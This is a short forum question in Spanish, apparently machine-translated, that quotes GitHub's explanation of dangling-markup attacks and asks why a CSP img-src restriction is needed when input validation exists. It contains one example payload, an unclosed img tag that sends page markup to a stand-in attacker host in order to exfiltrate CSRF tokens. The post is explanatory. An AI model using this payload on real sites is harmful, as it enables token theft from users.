GitHub explica el problema con img-src
en
"Viaje post-CSP de GitHub" :
Una etiqueta con una comilla no cerrada capturará toda la salida hasta la siguiente cita coincidente. Esto podría incluir contenido sensible a la seguridad en el páginas como:
<img src='https://some-evil-site.com/log_csrf?html= <form
%código% %código%action="https://github.com/account/public_keys/19023812091023"> ...
El elemento de imagen resultante enviará una solicitud a enlace .... Como resultado, un atacante puede aprovechar este ataque de marcado colgante para exfiltrar tokens CSRF a un sitio de su elección.
¿En qué se diferencia esto de presionar source-source en la página y enviar el contenido manualmente? Si es solo para páginas donde los usuarios pueden insertar entradas, ¿no tenemos que evitar solo esos problemas con las entradas agregando validaciones a la entrada? ¿No impide imr src de otras fuentes en todo el código?